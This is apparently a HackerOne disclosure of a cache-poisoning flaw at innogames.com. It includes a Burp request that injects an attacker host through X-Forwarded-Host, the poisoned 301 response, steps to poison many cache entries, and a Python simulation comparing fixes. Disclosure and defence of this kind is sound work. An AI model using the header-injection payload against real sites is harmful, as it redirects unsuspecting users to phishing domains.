hackerone | Mace | H1:960618
History: Aug 17, 2020 - 2:12 p.m.

InnoGames: Cache Poisoning via uppercase letters in invalid path

2020-08-17 14:12:52
mace
hackerone.com
$550
181

Summary of the issue

A cache poisoning vulnerability exists in requests to innogames.com. The backend normalises the language segment of the path to lowercase: a request for /DE/ is answered with a 301 redirect to /de/. The host in that redirect's Location header is taken from the X-Forwarded-Host request header. Because X-Forwarded-Host is not part of the cache key (the response only varies on Accept-Language and X-UA-Device), the redirect to the attacker-supplied host is stored by the Fastly cache, and every subsequent user who requests the same path and query string is redirected to it.

Vulnerable endpoint

https://innogames.com/DE/?variable=value

Steps to reproduce

  • Run Burp and navigate to the repeater tab to create a new request to the vulnerable endpoint:

>Host: www.innogames.com
>Port: 443
>Check: Use HTTPS

Request body:

GET /DE/?mace=triage HTTP/1.1
Host: www.innogames.com
Accept-Language: en,en-US;q=0.7,en;q=0.3
X-Forwarded-Host: not-evil.burpcollaborator.net
  • Hit send. The Location header of the response now carries the host we supplied in the X-Forwarded-Host header

Response:

HTTP/1.1 301 Moved Permanently
Location: https://not-evil.burpcollaborator.net/de/?mace=triage
Content-Type: text/html; charset=UTF-8
X-Served-By: cache-fra19153-FRA, cache-ams21024-AMS
X-Cache: MISS, MISS
X-Cache-Hits: 0, 0
X-Timer: S1597672892.323454,VS0,VE16
Vary: Accept-Language,X-UA-Device
[...]
  • Now every user who requests this endpoint (and is served by the same cache) will be redirected to https://not-evil.burpcollaborator.net/de/?mace=triage
  • Many poisoned entries can be created, because each distinct query string is cached separately: change the path from /DE/?mace=triage to /DE/?test=somethinghere (and vary the value of the X-Forwarded-Host header) to poison a new entry
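
To make the cache interaction concrete, the following Python model is added to this write-up; it is not code from the report, from InnoGames or from Fastly. It assumes the origin logic the report implies (lowercase the language segment, 301 to the canonical form, take the Location host from X-Forwarded-Host) and a cache keyed on host, path, query and the two headers named in the captured Vary header. The names origin, EdgeCache and run_scenario are chosen here. It replays the attacker-then-victim sequence against the vulnerable origin and against two fixes: an origin that always uses its canonical host, and an edge rule that strips X-Forwarded-Host before forwarding. It also shows why a different query string is a separate cache entry that the attacker has to poison on its own.

```python
CANONICAL_HOST = "www.innogames.com"
# Headers named in the captured response's Vary header. Together with host,
# path and query they form the cache key; X-Forwarded-Host is not among them.
VARY_HEADERS = ("Accept-Language", "X-UA-Device")


def make_request(path, query="", extra_headers=None):
    """Minimal request: Host and Accept-Language as in the report's request."""
    headers = {"Host": CANONICAL_HOST,
               "Accept-Language": "en,en-US;q=0.7,en;q=0.3"}
    headers.update(extra_headers or {})
    return {"path": path, "query": query, "headers": headers}


def origin(request, trust_forwarded_host):
    """Assumed origin behaviour: a language segment that is not lowercase is
    301-redirected to its lowercase form. With trust_forwarded_host=True the
    Location host comes from X-Forwarded-Host (the reported bug); with False
    it is always the canonical host (the origin-side fix)."""
    segments = request["path"].split("/")      # "/DE/" -> ["", "DE", ""]
    lang = segments[1] if len(segments) > 1 else ""
    vary = ",".join(VARY_HEADERS)
    if lang == lang.lower():
        return {"status": 200, "headers": {"Vary": vary},
                "body": "page for " + (lang or "default")}
    segments[1] = lang.lower()
    host = CANONICAL_HOST
    if trust_forwarded_host:
        host = request["headers"].get("X-Forwarded-Host", CANONICAL_HOST)
    location = "https://" + host + "/".join(segments)
    if request["query"]:
        location += "?" + request["query"]
    return {"status": 301, "headers": {"Location": location, "Vary": vary}}


class EdgeCache:
    """Shared cache in front of the origin. strip_headers models an edge rule
    that drops untrusted headers before the request reaches the origin."""

    def __init__(self, strip_headers=()):
        self.entries = {}
        self.strip = set(strip_headers)

    def fetch(self, request, trust_forwarded_host):
        """Serve one client request; returns (response, "HIT" or "MISS")."""
        headers = {k: v for k, v in request["headers"].items()
                   if k not in self.strip}
        request = dict(request, headers=headers)
        # X-Forwarded-Host takes no part in the key, so whatever it smuggled
        # into the cached response is replayed to every later client.
        key = (headers["Host"], request["path"], request["query"],
               tuple(headers.get(h, "") for h in VARY_HEADERS))
        if key in self.entries:
            return self.entries[key], "HIT"
        response = origin(request, trust_forwarded_host)
        self.entries[key] = response
        return response, "MISS"


def run_scenario(trust_forwarded_host, strip_at_edge=False,
                 victim_query="mace=triage",
                 attacker_host="not-evil.burpcollaborator.net"):
    """Attacker requests /DE/?mace=triage with X-Forwarded-Host set, then a
    victim requests /DE/?<victim_query> without it. Returns the victim's
    cache status and the Location they are redirected to."""
    strip = ("X-Forwarded-Host",) if strip_at_edge else ()
    cache = EdgeCache(strip_headers=strip)
    attacker = make_request("/DE/", "mace=triage",
                            {"X-Forwarded-Host": attacker_host})
    victim = make_request("/DE/", victim_query)
    cache.fetch(attacker, trust_forwarded_host)
    response, status = cache.fetch(victim, trust_forwarded_host)
    return status, response["headers"]["Location"]


if __name__ == "__main__":
    print("vulnerable origin      ", run_scenario(True))
    print("origin ignores XFH     ", run_scenario(False))
    print("edge strips XFH        ", run_scenario(True, strip_at_edge=True))
    print("different query string ", run_scenario(True, victim_query="test=x"))
```

Either fix on its own is enough in this model: once the origin stops deriving the redirect host from a client-controlled header, or the edge stops forwarding that header, the cached 301 always points at www.innogames.com. Adding X-Forwarded-Host to the cache key would also isolate the attacker's entry, but it leaves the reflection in place and is the weaker option.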

#Impact statement
This could be used for phishing attacks. An attacker can register a domain that looks similar to innogames.com, poison the cache so that the redirect points at it, and spread the poisoned link via Facebook or other forums; users who follow what looks like a legitimate innogames.com link are redirected to the attacker's domain. One requirement for exploitability is that the attacker must be close to the target users from a network point of view: Fastly caches are distributed, and each cache node keeps its own entries, so a poisoning request that is served by a different Fastly cache than the users' requests will not affect them.

#References
Security advisories from Fastly